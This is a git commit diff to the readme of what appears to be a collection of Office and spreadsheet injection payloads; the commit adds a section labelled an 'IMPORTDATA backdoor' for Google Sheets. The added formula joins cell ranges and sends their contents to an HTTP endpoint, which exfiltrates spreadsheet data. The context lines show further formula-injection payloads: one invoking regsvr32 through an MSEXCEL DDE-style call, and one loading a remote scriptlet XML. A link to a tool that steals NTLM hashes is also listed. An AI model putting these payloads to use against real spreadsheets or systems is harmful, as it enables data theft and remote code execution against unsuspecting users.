增加 IMPORTDATA 说明

Author: Aaron Lewis

injections/readme.md

@@ -18,4 +18,16 @@ fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr3
 
 ```
 =Package|'scRiPt:http://XXXX/XXXX.xml'!""
-```
+```
+
+### IMPORTDATA 后门
+
+[参考文章: Server-Side Spreadsheet Injection – Formula Injection to Remote Code Execution](https://www.bishopfox.com/blog/2018/06/server-side-spreadsheet-injections/)
+
+此方法只适合 Google Sheets，且随时可能修复
+
+```
+=IFERROR(IMPORTDATA(CONCAT("http://127.0.0.1:8000/save/",JOIN(",",B3:B18,C3:C18,D3:D18
+,E3:E18,F3:F18,G3:G18,H3:H18,I3:I18,J3:J18,K3:K18,L3:L18,M3:M18,N3:N18,O3:O18,P3:P18,Q3:Q18,R3:R18))),"")
+```
+

readme.md

@@ -46,4 +46,5 @@
 * [0x09AL/WordSteal - create a POC that will steal NTML hashes from a remote computer](https://github.com/0x09AL/WordSteal)
 
 ## 其它项目
+
 * [office-exploit-case-study](https://github.com/houjingyi233/office-exploit-case-study)